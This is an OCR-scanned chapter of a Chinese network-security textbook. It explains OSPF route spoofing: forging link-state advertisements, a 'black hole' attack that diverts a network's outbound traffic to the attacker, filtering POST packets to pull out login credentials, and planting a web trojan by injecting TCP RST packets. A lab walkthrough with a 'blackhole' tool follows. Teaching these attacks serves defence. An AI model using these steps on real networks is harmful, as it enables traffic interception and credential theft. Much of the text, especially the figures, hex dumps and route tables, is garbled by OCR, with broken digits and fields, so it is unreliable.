622 攻击 者 发 布 伪造 的 链 路 状态 通告 报 文 


攻击 者 如 何 才能 截获 netl 发 给 net3 的 通信 数据 呢 ? 通过 图 6-19 可 知 ,正常 情况 下 ， 
R1 的 路 由 表 中 到 达 net3 的 下 一 跳 路 由 器 是 R2, 也 就 是 说 netl 发 往 net3 的 数据 会 提交 
给 R2 路 由 器 。 如 果 能 修改 这 条 路 由 ,将 下 一 跳 路 由 器 改 为 攻击 者 主机 IP ,那么 攻击 目的 
就 可 以 实现 ,这 可 以 通过 发 布 伪造 的 链 路 状态 通告 报 文 来 实现 。 

OSPF 是 基于 链 路 状态 的 路 由 选择 协议 ,每 隔 固 定 的 时 间 ( 例 如 10s) ,路 由 器 会 将 自 
己 的 链 路 状态 信息 通告 给 临近 的 其 他 路 由 器 。 这 种 机 制 保证 当 网 络 中 某 条 链 路 发 生变 化 
时 ,这 一 变化 信息 会 及 时 传递 给 网 络 中 的 其 他 路 由 器 ,路 由 器 会 根据 链 路 状态 信息 更 新 自 
己 的 路 由 表 。 攻 击 者 正 是 利用 这 种 机 制 发 布 伪造 的 链 路 状态 通告 报 文 来 修改 Rl 的 路 
由 表 。 

攻击 者 将 自己 伪造 为 新 加 入 net2 的 一 台 路 由 器 ,首先 通过 OSPF 的 HELLO 机 制 与 
Rl 和 R2 路 由 器 建立 邻接 关系 ,使 自己 成 为 net2 内 的 一 台 合法 路 由 器 。 

接 下 来 ,攻击 者 发 布 一 条 伪造 的 链 路 状态 信息 ( 见 图 6-19 中 虚线 链 路 ) ,声称 自己 包 
含 一 条 到 达 net3 的 链 路 ,其 代价 为 1。R1l 收 到 这 个 通告 报 文 后 会 更 新 自己 的 路 由 表 ,将 
net3 的 下 一 跳 路 由 器 改 为 攻击 者 H( 应 用 Dijkstra 算法 ) 。R2 收 到 这 个 通告 后 不 会 更 新 
自己 的 路 由 表 ( 原 因 后 面 分 析 ) 。 图 6-20 给 出 的 是 攻击 者 伪造 的 链 路 状态 通告 报 文 。 

这 个 伪造 的 数据 包 包括 14 字 节 的 链 路 层 数据 .20 字 节 的 IP 首部 .76 字 节 的 OSPF 
链 路 状态 通告 数据 。 在 链 路 层 数据 中 ,目的 MAC 地 址 为 组 播 地 址 01. 00. 5e. 00. 00. 05 ， 
交换 机 会 在 组 播 端口 转发 这 个 报 文 。 源 MAC 地 址 为 攻击 者 MAC ,协议 类 型 为 0x0800。 
在 IP 首部 中 源 IP 地 址 为 攻击 者 IP: 50.1.1.3, 目 的 JIP 为 组 播 地 址 224. 0. 0.5, 这 个 组 播 
IP 地 址 用 于 路 由 器 之 间 的 通信 ,这 保证 网 络 内 的 所 有 路 由 器 都 会 接收 .处理 这 个 数据 报 。 
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2 | len=76 
50.1.1.3 -一 Iouterid 
0.0.0.0 —= area id 
check 1 —= auth type 
| } password 
2480 
| -一 advertisement num 
link state age -一 1 2 1 | 一 route link 
50.1.1.3 -一 link state id 
50.1.1.3 —— advertising route 
seq num 
check 48 — len 
0 0 2 —— router link num 
linkid -一 | 50.1.1.4 
link data -一 50.1.1.3 | first link 
link type -一 | 2 0 metric=2 
| 60111 
01.00.5e.00.00.05 60.1.1.3 | Second link 
hack MAC | 2 | 0 metric=1 
介 | 20B | 介 
Link data | IPheader | 
| J 76B 
0x45| 0 length 
id flag 
TIL | 89 check 
50.1.1.3 hack ip 
224.0.0.5 


图 6-20 攻击 者 伪造 的 链 路 状态 通告 报 文 


在 76 字 节 链 路 状态 通告 数据 中 包含 两 条 通告 信息 ,第 一 条 通告 表示 攻击 者 有 一 条 到 
达 50.1.1.0 网 络 的 链 路 ,其 代价 为 2。 第 二 条 通告 表示 攻击 者 有 一 条 到 达 60. 1.1.0 网 
络 的 链 路 ,其 代价 为 1。 


623 路 由 器 应 用 Dijkstra 算法 更 新 自己 的 路 由 表 


OSPF 路 由 器 将 定期 接收 到 的 链 路 状态 通告 报 文保 存在 本 地 的 链 路 状态 数据 库 中 ， 
可 以 认为 网 络 中 每 台 路 由 器 的 链 路 状态 数据 库 都 是 相同 的 ,其 中 保存 了 所 有 网 络 链 路 的 
状态 信息 。 更 新 前 的 链 路 状态 数据 库 如 图 6-21 所 示 ,其 中 包括 4 条 正常 的 网 络 链 路 的 状 
态 信息 。 

R1 和 R2 路 由 器 都 会 收 到 攻击 者 伪造 的 链 路 状态 通告 报 文 ,并 将 其 中 包含 的 两 条 链 
路 状态 信息 存 入 链 路 状态 数据 库 ( 见 图 6-21 右 侧 ) 。R1 和 R2 路 由 器 对 更 新 后 的 链 路 状 
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RI NI 2 
A 伪造 链 路 信息 一 oe 
R2 N2 2 A 
R2 N3 2 

更 新 前 的 链 路 状态 数据 库 更 新 后 的 链 路 状态 数据 库 


图 6-21 更 新 前 后 的 链 路 状态 数据 库 


态 数据 库 应 用 Dijkstra 算法 生成 各 自 的 路 由 表 。 

Dijkstra 算法 描述 如 下 : @ 从 本 地 结 点 (路 由 器 ) 开 始 , 本 地 结 点 就 是 树 根 ; @ 把 代价 
0 指派 给 这 个 结 点 ,并 使 它 成 为 第 一 个 永久 结 点 ; @ 对 最 新 的 永久 结 点 的 每 一 个 相 邻 结 
点 进行 检查 ,给 每 一 个 结 点 指派 一 个 累计 代价 ,并 使 它 成 为 临时 的 (注意 : 不 对 已 经 是 永 
久 结 点 的 相 邻 结 点 进行 检查 ); @ 在 临时 结 点 的 清单 中 ,a. 寻找 具有 最 小 累计 代价 的 结 
点 ,并 使 它 成 为 永久 的 ; b. 车 一 个 结 点 从 多 于 一 个 方向 可 达 , 选 择 具有 最 小 累计 代价 的 方 
向 ; @ 重 复 步骤 @、@, 直 到 每 一 个 结 点 成 为 永久 的 。 

R1 路 由 器 根据 链 路 状态 数据 库 计 算 最 短路 径 树 的 过 程 如 图 6-22 所 示 。 第 一 步 : 以 
R1 为 根 结 点 开始 计算 。 第 二 步 : 增加 R1 的 相 邻 结 点 Nl1 和 N2 并 计算 累计 代价 。 第 三 
步 : 增加 N2 的 相 邻 结 点 H 和 R2 并 计算 累计 代价 (注意 网 络 到 路 由 器 方向 不 计算 代价 ) 。 
第 四 步 : 增加 也 的 相 邻 结 点 N3 并 计算 累计 代价 为 3。 第 五 步 : 计算 R2 结 点 ,从 R2 也 
可 以 到 达 N3 ,但 这 条 路 径 的 累计 代价 为 4, 大 于 从 H 到 达 N3 的 累计 代价 3, 因 此 不 使 用 
这 条 路 径 。 


EECD 


(a) 从 RI 开始 (b) 加 上 R1 的 相 邻 结 点 


RI NI 
RI N2 
H N2 
H N3 
R2 N2 
R2 N3 2 


链 路 状态 数据 库 


D-DDD 


N1 2 
N2 2 
N3 3 


(d) 加 上 H 的 相 邻 结 点 (e) 得 到 R1 的 路 由 表 
图 6-22 ”RI1 最 短路 径 树 的 计算 过 程 
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至 此 最 短路 径 树 的 计算 结束 ,得 出 了 不 存在 回路 的 网 络 最 短路 径 树 。 最 后 ,Rl 路 由 
器 应 用 这 棵 最 短路 径 树 计 算出 自己 的 路 由 表 , 见 图 6-22 右 下 角 。 可 见 此 时 到 达 N3 的 下 
一 跳 路 由 器 为 了 H( 即 攻击 者 ) ,netl 发 给 net3 的 数据 将 转发 给 攻击 者 。 

R2 路 由 器 根据 链 路 状态 数据 库 计 算 最 短路 径 树 的 过 程 如 图 6-23 所 示 。 第 一 步 : 以 
R2 为 根 结 点 开始 计算 。 第 二 步 : 增加 R2 的 相 邻 结 点 N2 和 N3 并 计算 累计 代价 。 第 三 
步 : 增加 N2 的 相 邻 结 点 了 和 有 R1 并 计算 累计 代价 (注意 网 络 到 路 由 器 方向 不 计算 代价 ) 。 
第 四 步 : 增加 R1 的 相 邻 结 点 Nl 并 计算 累计 代价 为 4。 第 五 步 : 计算 N3 结 点 ,从 N3 可 
以 到 达 再, 从 N2 也 可 以 到 达 百 , 这 两 条 路 径 的 代价 相同 ,因此 不 添加 N3 到 HH 的 路 径 。 


2 
[| Co 区 
2 

RN |] 从 R2 开 始 (b) 加 上 R2 的 相 邻 结 点 
RI N2 2 2 2 

{M2 一 CD- 一 国 | 
:| 

R2 N2 2 和 2 

R2 N3 2 
链 路 状态 数据 库 加 Sn 

(© 加 上 N2 的 相 邻 结 点 


NI 4 RI 
N2 2 一 
N3 2 一 


(d) 加 上 R1 的 相 邻 结 点 (e) 得 到 R2 的 路 由 表 
图 6-23 R2 最 短路 径 树 的 计算 过 程 


至 此 最 短路 径 树 的 计算 结束 ,得 出 了 不 存在 回路 的 网 络 最 短路 径 树 。 最 后 R2 路 由 
屁 应 用 这 棵 最 短路 径 树 计算 出 自己 的 路 由 表 , 见 图 6-23 右 下 角 。 可 见 此 时 到 达 N1 的 下 
一 跳 路 由 器 仍 为 R1, 即 net3 发 给 netl 的 数据 不 会 经 过 攻击 者 中 转 。 


03 基于 OSPF 路 由 欺骗 的 “黑洞 攻击 ” 


基于 OSPF 路 由 欺骗 的 “黑洞 攻击 ”是 指 在 区 域 网 络 的 路 由 器 中 注入 恶意 路 由 , 当 恶 
意 路 由 最 终 扩 散 至 所 有 区 域 路 由 器 后 ,发 往 某 个 特定 网 络 数据 包 的 传输 流向 将 被 恶意 更 
改 , 数 据 将 被 发 送 到 黑客 指定 的 目的 地 ,这 个 目的 地 就 像 * 黑 洞 ”一 样 将 发 往 某 个 特定 网 络 
的 数据 包 吸 引 过 来 ,因此 称 这 种 攻击 为 “黑洞 攻击 ”。 


63.1 “黑洞 攻击 ”的 基本 原理 


我 们 采用 如 图 6-24 所 示 的 网 络 拓扑 结构 进行 介绍 ,网 络 202. 1. 1. 0 模拟 使 用 全 局 合 
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法 地 址 的 外 部 因特网 。R1 是 连接 内 部 局 域 网 和 外 部 因特网 的 边界 路 由 器 ,在 内 、 外 网 通 
信 的 过 程 中 , 它 负责 进行 内 部 专用 地 址 与 外 部 合法 地 址 的 相互 转换 。 内 部 局 域 网 包括 三 
个 使 用 专用 地 址 的 网 络 : 192. 1. 1.0、192. 2.2.0 和 192. 3. 3.0, 这 三 个 网 络 通过 两 台 路 由 
器 R2 和 R3 连接 在 一 起 。 网 络 拓 扑 中 每 条 数据 链 路 的 传输 代价 都 标记 在 链 路 的 旁边 。 


外 部 因特网 192.2.2.1 


202.1.1.1 


RI1 192.1.1.1 R3 192.3.3.1 


NAT 路 由 器 内 部 局 域 网 
图 6-24 网 络 拓扑 结构 


内 部 局 域 网 使 用 OSPF 协议 实现 网 络 连通 。R2 和 R3 路 由 器 的 两 个 内 网 接口 均 开 
启 OSPF 协议 ,R1 路 由 器 只 在 内 网 接口 开启 OSPF 协议 ,而 外 网 接口 不 开启 。OSPF 协 
议 开 启 之 后 ,三 个 内 部 网 络 之 间 就 实现 了 连通 ,但 此 时 内 部 网 络 仍 无 法 与 外 网 通信 。 为 了 
实现 内 、 外 网 的 连通 ,需要 在 R3 上 增加 指向 R2 的 默认 路 由 ,在 R2 上 增加 指向 R1 的 默 
认 路 由 ,这 样 一 来 ,内 网 发 给 外 网 的 数据 将 沿 着 R3 一 R2 一 R1 的 流向 传递 给 R1, 由 Rl 进 
行 地 址 转换 之 后 再 传递 给 外 网 。 图 6-25 给 出 了 每 台 路 由 器 对 应 的 路 由 表 , 以 及 NET2 向 
外 部 网 络 发 送 数据 的 情况 。 


也 
be 
x# wb 一 


Nl 1 一 Nl 2 R2 
N2 3 R2 N2 1 一 
N3 4 R2 N3 1 一 
# * R2 
R1 的 路 由 表 
R3 的 路 由 表 


图 6-25 正常 情况 下 内 网 向 外 网 发 送 数据 的 情况 
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下 面 以 图 6-26 为 例 说 明 “ 黑 洞 攻 击 ”。 首 先 连接 在 NET3 上 的 Hacker 在 网 络 中 发 布 
一 条 伪造 的 数据 链 路 信息 , 它 声 称 自己 拥有 一 条 到 达 202. 1. 1.0 网 络 的 数据 链 路 ,其 代价 
为 1。 很 快 这 条 链 路 信息 就 会 通过 OSPF 协议 的 数据 链 路 更 新 机 制 扩散 到 R3、R2 和 R1 
路 由 器 。 收 到 这 条 链 路 信息 之 后 ,这 三 台 路 由 器 都 会 重新 计算 自己 的 路 由 表 , 在 各 自 的 路 
由 表 中 添加 一 条 到 达 202. 1.1.0 网 络 的 路 由 信息 。R1 新 增 的 路 由 表 项 为 N4-5-R2 ,表示 
发 往 N4 的 IP 数据 报应 该 转发 给 R2、 累 计 代 价 为 5。R2 新 增 的 路 由 表 项 为 N4-4-R3, 表 
示 发 往 N4 的 IP 数据 报应 该 转发 给 R3、 累 计 代 价 为 4。R3 新 增 的 路 由 表 项 为 N4-2-H， 
表示 发 往 N4 的 IP 数据 报应 该 转发 给 Hacker、 累 计 代价 为 2。 

下 面 以 NET2 为 例 说 明 路 由 欺骗 成 功 之 后 的 数据 流向 。 由 于 NET2 网 络 内 主机 的 
默认 网 关 是 R2 路 由 器 ,因此 NET2 内 主机 发 给 外 部 因特网 202. 1. 1.0 的 IP 数据 报 都 会 
传送 给 R2。R2 收 到 这 些 IP 数据 报 之 后 ,取出 目的 IP 地 址 到 路 由 表 中 查找 ,发 现 和 第 4 
条 记录 匹配 , 即 N4-4-R3。 于 是 R2 向 NET2 内 的 主机 发 送 ICMP 重 定向 报 文 ,要 求 这 些 
主机 将 到 达 202. 1. 1.0 网 络 的 默认 路 由 更 改 为 R3。 之 后 ,NET2 内 的 主机 会 将 发 往外 部 
因特网 的 IP 数据 报 发 给 R3 路 由 器 ,R3 查找 自己 的 路 由 表 之 后 ,将 这 些 IP 数据 报 传送 给 
Hacker。 通 过 分 析 可 见 , 三 个 内 部 网 络 发 给 外 部 因特网 的 IP 数据 报 都 会 传送 给 Hacker， 
它 就 像 * 黑 洞 ”一 样 将 发 给 202. 1. 1.0 网 络 的 数据 吸引 过 来 ,因此 称 这 种 攻击 为 “黑洞 攻 
击 ”。 图 6-26 给 出 的 是 “黑洞 攻击 ”之 后 的 数据 流向 。 利 用 这 种 攻击 黑客 可 以 实现 “敏感 
信息 截获 ”和 “木马 植 入 ”。 


Nl 1 一 
N2 2 = 
N3 3 R3 | R2 的 路 由 表 
N4 4 R3 
* * Rl 
外 部 因特网 ICMP 重 定向 。 NET2z Hacker NET4 


202.1.1.0 | 202.1.1.0 
伪造 链 路 


NL 1 一 NI 2 R2 
N2 3 R2 N2 1 一 
N3 4 R2 | RI 的 路 由 表 N3 1 一 | R3 的 路 由 表 
N4 5 R2 N4 2 H 
束 * R2 


图 6-26 “黑洞 攻击 ”之 后 的 数据 流向 
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632 利用 “黑洞 攻击 ”截获 敏感 信息 


“黑洞 攻击 ”成 功 实施 之 后 ,内 部 网 络 发 送 给 外 部 因特网 的 IP 数据 报 都 会 传送 给 
Hacker 主机 。 这 些 IP 数据 报 中 可 能 存在 少量 关键 报 文 ,例如 ,包含 账户 信息 的 HTTP 
报 文 ;包含 聊天 内 容 的 MSN 通信 报 文 ;包含 上 传 、 下 载 文 件 内 容 的 FTP 报 文 ;包含 邮件 
内 容 的 SMTP 报 文 。Hacker 可 以 从 这 些 少量 的 关键 报 文中 提取 出 敏感 信息 。 下 面 以 包 
含 账户 信息 的 HTTP 报 文 为 例 分 析 敏 感 信息 的 提取 方法 。 

用 户 在 登录 自己 的 邮箱 .论坛 . 微 博 、 网 银 时 ,都 需要 在 网 页 内 输入 账户 和 密码 ,输入 
的 敏感 信息 会 被 封装 在 一 个 特定 的 报 文 内 发 送出 去 。 截 获 这 个 数据 报 , 并 从 中 提取 出 敏 
感 信息 是 黑客 最 为 关心 的 一 件 事情 。 图 6-27 给 出 的 是 黑客 主机 截获 的 包含 受害 者 账户 、 
密码 的 登录 数据 报 。 这 类 报 文 包括 14 字 节 链 路 层 数据 .20 字 节 IP 数据 .20 字 节 TCP 数 
据 和 多 个 字 节 的 HTTP 数据 。 如 何 从 中 转 的 海量 数据 报 中 准确 识别 出 包含 敏感 信息 的 
报 文 呢 ? 通过 大 量 实验 发 现 ,敏感 信息 通常 使 用 POST 方法 发 送 , 即 数据 报 的 HTTP 数 
据 部 分 前 4 个 字 节 是 “POST”, 根 据 这 个 条 件 可 以 将 包含 敏感 信息 的 报 文 过 滤 出 来 。 

确定 了 包含 敏感 信息 的 通信 报 文 , 接 下 来 如 何 从 该 数据 报 中 提取 出 敏感 信息 呢 ? 通 
过 大 量 实验 发 现 , 敏 感 信息 通常 包含 在 HTTP 数据 的 content 部 分 。 这 部 分 内 容 包 含 在 
HTTP 数据 的 尾部 ,并 且 content 与 上 一 项 内 容 之 间 存 在 一 个 空 行 ,使 用 Sniffer 查看 , 即 
存在 两 个 字 节 0x0a 和 0x0d ,分 别 代表 回 车 和 换行 。 以 此 为 条 件 就 可 以 提取 出 content 数 
据 , 即 从 HTTP 数据 的 尾部 开始 向 前 读 取 , 当 识别 出 0x0a 和 0x0d 时 识别 结束 ,将 这 部 分 
内 容 保 存 下 来 ,其 中 就 包含 敏感 信息 。 


s-port | d-port 
seq number 
ack unmber 
hacker MAC flag window 
victim MAC check urg 
个 20B 
Link data IP header TCPhead 
14B UL 
length | POST/login.asp 一 = request line 
id fl Rae 
Ee | head 
check | Bs 
victim ip | -一 blankline 
target ip | user=xgt&pass=ab 一 = entity 


图 6-27 包含 账户 信息 的 IP 数据 报 


图 6-28 给 出 的 是 一 个 实际 的 HTTP 数据 报 , 可 以 看 到 它 的 传输 方式 是 POST, 在 
content 部 分 携带 了 用 户 名 jack, 密 码 2481。 
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p0000000 : Ee 的 括 
; .| 。 

Y.P`SI .#?9P 

?. POST /nail 
/login.asp HTTP/ 
1.1..Accept: ima 
ge/gif, image/jp 
eg. image/pjpeg. 
image/pjpeg. ap| 
plication/x-shoc| 
kwave-f lash, app| 
lication/vnd .ms 一 
excel, applicati 
on/vnd .ms—powerp| 
oint, applicatio| 
n/msword, */¥..R| 
eferer: http://1 
92.168.0.4/mail/ 
index .asp. .Accep 
t-Language: zh-c 
n..User-Agent: ¥M| 
ozilla/4.0 (comp 
atible; MSIE 8.0 
; Windows NT 5.1 
; Trident/4.0; 
NET CLR 2.0.5072 
7) . .Content-Type| 
: application/x— 
www-form-urlenco 
ded . .Accept -Enco 
ding: gzip, defl 
ate. .Host: 192.1 
68.0.4..Content— 
Length: 19. .Conn 
ection: Keep-Ali 
ve. .Cache-Contro 
1: no-cache. .Coo 
kie: ASPSESSIONI 
DQQGGQOGC=MJCBPP 
DDOMKDDLMBBNAFKM 
IIL. .. .User=jack& 
Pass=2481 


po000290: 


图 6-28 ”携带 账户 信息 的 HTTP 数据 报 


633 利用 “黑洞 攻击 ”进行 木马 植 入 
利用 “黑洞 攻击 ”可 以 进行 木马 种 植 ,其 流程 分 为 4 个 阶段 ,如 图 6-29 所 示 。 第 一 阶 


段 是 终止 之 前 的 TOP 通信 。 此 时 受害 者 正在 victim hacker 
与 202. 1. 1.0 网 络 内 的 某 台 主机 进行 TCP 通 ep aia 
信 , 例 如 接收 电子 邮件 。 由 于 恶意 路 由 的 植 入 RE 终止 之 前 的 通信 
导致 数据 改变 方向 ,传递 给 黑客 主机 。TCP 是 
面向 连接 的 传输 协议 ,为 了 完成 木马 植 入 ,攻击 SYN 
者 需要 建立 一 条 新 的 TCP 连接 。 为 了 达到 这 一 SNACK 三 次 握手 建立 新 连接 
目的 ,黑客 发 送 一 个 RST 报 文 ,将 之 前 的 TCP 连 ACK 
接 异常 终止 ,为 随后 的 木马 植 入 做 好 准备 。 We 

之 前 的 TCP 通信 被 异常 终止 之 后 ,为 了 完 ACK 传递 网 页 木马 
成 被 中 断 的 邮件 下 载 任务 受害 者 会 主动 发 送 第 
一 次 握手 建立 连接 的 SYN 报 文 。 其 后 攻击 者 RST 二 
返回 第 二 次 握手 SYN 十 ACK 报 文 , 受 害 者 返回 1 1 


第 三 次 握手 ACK 报 文 。 至 此 新 的 TCP 连接 已 
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图 6-29 利用 “黑洞 攻击 ”种 植木 马 


maa 第 6 章 OSPF 协议 及 其 安全 问题 mm 


经 建立 起 来 。 

随后 攻击 者 将 一 个 包含 网 页 木马 程序 的 HTTP 数据 报 发 送 给 受害 者 ,由 于 网 页 木马 
的 代码 量 通常 很 小 (小 于 1024 字 节 ), 因 此 可 以 封装 在 一 个 IP 数据 报 内 。 收 到 这 个 
HTTP 数据 报 之 后 ,受害 者 返回 一 个 ACK 确认 报 文 。 这 个 包含 挂 马 代码 的 HTTP 数据 
报 会 将 受害 者 主机 引导 至 一 个 包含 木马 程序 的 恶意 站 点 ,如果 受 害 者 主机 的 IE 浏览 器 没 
有 打 补 丁 程序 , 则 会 自动 下 载 并 运行 木马 程序 。 

最 后 攻击 者 发 送 一 个 RST 报 文 将 这 条 TCP 连接 异常 终止 ,至 此 木马 种 植 完成 。 


634 通过 实验 验证 “黑洞 攻击 ” 


下 面 采用 如 图 6-24 所 示 的 网 络 拓 扑 来 验证 “黑洞 攻击 ”, 重 点 观察 攻击 前 后 NET2 发 
给 外 部 因特网 的 IP 数据 报 流向 的 变化 。 

第 一 步 : 配置 各 个 对 象 的 地 址 信息 。 

以 host-only 方式 启动 三 台 Windows 2000 虚拟 机 ,分 别 代 表 R1、R2、R3 ,参照 图 6-24 
配置 各 个 对 象 的 IP 地 址 。 注 意 : 本 机 扮演 Hacker, 接 入 192. 3. 3.0 网 络 ,用 于 测试 ,IP 
地 址 为 192. 3. 3. 20 ,网 关 设 置 为 192. 3. 3.1。 启 动 Windows 2000 虚拟 机 扮演 测试 机 C1， 
接 入 NET2,IP 地 址 为 192. 2. 2. 30, 网 关 设 置 为 192. 2. 2. 1。 每 台 路 由 器 的 地 址 信息 如 
图 6-30 一 图 6-34 所 示 。 


Ethernet adapter 末 地 址 2: 


Description . . - - 。 - - : AMD PCNET Family PCI Ethernet hdapter #; 
Physical hddress- . . . - : 88-8C-29-C3-5D-ED 

DHCP Enabled. - - - . - - :No 

IP hddress- 。 。 。。 。 。 。: 192.1.1.1 


Subnet Mask . . - - - - - : 255.255.255.8 


Ethernet adapter 本 地 连接 : 


Description . . - - . - - : AMD PCNET Family PCI Ethernet hdapter 
Physical Address. . . - - : 96-BC-29-C3-5D-E3 

DHCP Enabled. . - - - - - :No 

IP hddress- - - - - - - - : 282.1.1.1 

Subnet Mask - - - - - - - : 255.255.255.0 


图 6-30 ”RI1 的 地 址 信息 


Ethernet adapter 本 地 连接 2: 


Description . . - - - - - : AMD PCNET Family PCI Ethernet hdapter #2 
Physical Address. . . - . : B86-8C-29-A3-78-45 

DHCP Enabled. - - - - - - :No 

IP hddress- - - - - - - - : 192.2.2. 

Subnet Mask . - - - - - - : 255.255.255.0 


Ethernet adapter 本 地 连接 : 


Description - - - - - - - : AMD PCNET Family PCI Ethernet hdapter 
Physical Address. . - - - : 088-8C-29-A3-78-48 

DHCP Enabled. - - - - - - :No 

IP hddress- - - - - 。 - - : 192.1.1.2 

Subnet Mask - - - - - - - : 255-255-255-8 

Default Gateway - - - - - : 192.1.1.1 网 关 指 向 R1 


图 6-31 R2 的 地 址 信息 
第 二 步 : 为 三 台 路 由 器 开启 OSPF 路 由 功能 ,实验 网 络 间 的 通信 。 
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Description 
Physical nddress 
DHCP Enabled - 
IP Address 
Subnet Mask - 
Default Gateway 
DNS Servers 


人 192.3.3.1 
0 255.255.255.8 


Description 
Physical hddress 
DHCP Enabled 
IP Address. - 


Default Gateway - . - - - : 192.2.2.1 


| 


Ethernet adapter 本 地 连接 3: 


Ethernet adapter 本 地 连接 2: 


RMD PCNET Family PCI Ethernet hdapter #3 
B86-8C-29-66-87-61 
No 


AMD PCNET Family PCI Ethernet Adapter #2 
88-8C-29-66-87-57 

No 

192.2.2.2 

255.255.255.8 


网 关 指 向 R2 


Ethernet adapter 


Description 
Physical fddress. . . - 


Dhcp Enabled. 


IP Address 


Subnet Mask - 


Default Gateway - . - - 192.3.3.1 


图 6-32 R3 的 地 址 信息 


UMware Uirtual Ethernet hdapter for UMnet1 
-58-56-C8-886-81 

No 

192.3.3.28 


。 255.255.255 


网 关 指 向 R3 


图 6-33 ”Hacker 的 地 址 信息 


Ethernet adapter 末 地 连 授 : 


Description 
Physical Address. 
DHCP Enabled. 
IP Address. . 
Subnet Mask - 
Default Gateway . 


六 192.2.2.38 


AMD PCNET Family PCI Ethernet Adapter 
88-8C-29-5C-7E-7B 
No 


255.255.255.08 


局 默认 网 关 R2 


开通 OSPF 路 由 之 后 ,在 


图 6-34 主机 C1 的 地 址 信息 


王佐 
- 口 


路 由 器 上 可 以 查看 到 路 由 信息 , 见 图 6-35 一 图 6-37。 


255. 255. 255. 255 
255. 255 


0 
0 
机 
0 
0 
0 
1 
0 
0 
1 
0 


图 6-35 ”RIl 的 路 由 表 


具 [RN |R 关 | 路 点数 | 通信 协议 

255. 255. 255. 255 。 255. 255. 255. 255 192.2.2.1 1 本 地 

255. 255. 255. 255 。 255. 255. 255. 255 192.1.1.2 1 本 地 

224.0.0.0 240.0.0.0 192.2.2.1 本 地 

224.0.0.0 240.0.0.0 192.1.1.2 本 地 

192.3.3.0 255. 255. 255.0 192.2.2.2 3 0SPF HH3 3 BR3 
192.2.2.1 255. 255. 255. 255 127.0.0.1 1 本 理 

192.2.2.0 255. 255.255.0 192.2.2.1 2 0SFF BW2 2 一 
192.2.2.0 255. 255. 255.0 192.2.2Z. 工 平 弄 

192.1.1.2 255. 255. 255. 255 127.0.0.1 由 本 地 

192.1.1.0 255. 255. 255.0 192.1.1.2 1 [ed 
192.1.1.0 255. 255. 255.0 192.1.1.2 1 Ea 

127.0.0.1 255. 255. 255. 255 127.0.0.1 1 本 地 

127.0.0.0 255.0.0.0 127.0.0.1 1 本 地 

0.0.0.0 0.0.0.0 192.1.1.1 出 网 络 管理 * * B1 


图 6-36 了 R2 的 路 由 表 
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EE 
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Ei 
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SN 
四 
SR 
2 


at 
o 


“加 


咏 仿 福 及 民 信 仿 局 凡 仿 凡凡 六 避 
NPPlhRlsealoDRawnw 
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图 6-37 R3 的 路 由 表 


可 以 发 现 三 个 路 由 表 与 之 前 的 计算 结果 一 致 。 
图 6-38 为 测试 主机 C1 的 路 由 表 。 


Network Destination 


9.9.9.9 192.2.2.1 
127.-9-9.8 127。 
192.2.2.8 255.255.255.8 
192.2.2.38 255.255.255.255 


192.2.2.255 
224.8.8.8 
255.255.255.255 255.255.255.255 
Default Gateway: 


255.255.255.255 192 
224-8-8-.8 


Gateway 


38 
192.2.2.39 
192.2.2.38 


192.2.2.1 


Interface Metric 


默认 网 关 指 向 R2 


上 地 


图 6-38 测试 主机 Cl 的 路 由 表 


第 三 步 : 捕获 数据 报 ,分 析 正 常情 况 下 Cl 向 因特网 发 送 数据 的 流向 。 

在 测试 机 Cl 上 执行 ping 202. 1.1.1 -命令 ,该 命令 将 使 Cl 主机 不 停 地 向 外 部 网 络 
发 送 IP 数据 报 。 首 先 Cl 取出 IP 数据 报 的 目的 IP 地 址 202.1.1.1 到 自己 的 路 由 表 中 匹 
配 , 发 现 和 默认 路 由 (x* 一 x 一 R2) 匹 配 ,于 是 将 IP 数据 报 发 送 给 R2。R2 收 到 IP 数据 报 
之 后 ,发 现 报 文 的 目的 IP 地 址 与 默认 路 由 (* 一 * 一 R1) 匹 配 ,于 是 将 这 个 IP 数据 报 转 
发 给 R1。 最 终 报 文 到 达 目 的 地 ,此 时 IP 数据 报 的 传输 路 径 是 C1 一 R2 一 R1。 下 面 通过 
捕获 IP 数据 报 进行 验证 , 见 图 6-39、 图 6-40。 


R2 在 NET2 的 接口 MAC 主机 CI 的 MAC 琢 下 
0000000: 00_0c 29|a3 70 45 00 Oc 29| 5c 738 7b 08 00 45 00 ..) E..)\~{..E 
0000010: 00 3c 08 bd 00 00 80 01 a4 el SO 02 02 le ca 01 .<.?.6.%?..7? 
0000020: 01 01 08 00 3b Sc 02|00 10 00 61 62|63 64 65 66 .i\... .abcdef 
0000030: 67|68 69 6a 6b 6c 6d|lbe 6f ?0 ?1 72173 74 75 76 ghijklmopqrstuvl 
0000040: 77|61 62 63 64 65 66|67 68 69 wabcdef ghi 
目的 IP:202.1.1 TTL=128 源 IP:192.2. 2. 30 
图 6-39 主机 Cl 发 给 R2 的 IP 数据 报 
Ri 大 NETI 的 后 口 MAC R2 在 NETI1 的 接口 MAC 
0000000: 00 0c 29|c3 sd ed 00 Oc 29|a3 70 40 08 00 45 00 ..) 肝 ?7.) @..E 
0000010: 00 3c 08 bd 00 00 7?f 01 a5 el c0 02 02 le ca 01 .<.?.1.23..? 
0000020: 01 01 08 00 3b Sc 02|00 10 00 61 62|63 64 65 66 ....;\....abcdef 
0000030: 67|68 69 6a 6b 6c 6d| 6e 6f 70 ?71 72|73 74 75 76 ghijklmopqrstuv 
0000040: 77|61 62 63 64 65 66| 67 68 69 wabcdef ghi 
目的 IP:202. 1. 1.1 TTL=127 源 IP: 192. 2. 2. 30 


第 四 步 : 在 Hacker 主机 实施 OSPF 路 由 欺骗 ,发 布 一 条 伪造 的 数据 链 路 信息 。 


图 6-40 R2 转发 给 R1 的 IP 数据 报 
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在 Hacker 主机 实施 OSPF 路 由 欺骗 ,发 布 一 条 伪造 的 数据 链 路 信息 ,黑客 声称 自己 
拥有 一 条 到 达 202. 1. 1.0 网 络 的 数据 链 路 ,其 传输 代价 为 1, 见 图 6-41、 图 6-42。 


二 D:\¥INDOYS\systen32\cad. exe — blackhole [- [Ic]xl 


1- \Device\NPF_GenericNdisWanAdapter 
2- \DeuiceNNPF_([989B9265-9D74-469ES-h19F-4B5C9F4D8889} 


Select the number of the adapter to open : 2 


网 卡 编号 
图 6-41 选择 网 卡 


°° D:\¥INDOWS\systen32\cad. exe - blackhole 


F:\>blackhole 
Packet .dll test application. Library version:3, 1, 0, 24 
Adapters installed: 


1- \DeuiceNNPF_GenericNdisuanhdapter 


2- \Device\NPF_{980BO205-9D74-40ES-A1QF-4BSCOF4D8880}) 


Select the number of the adapter to open : 2 
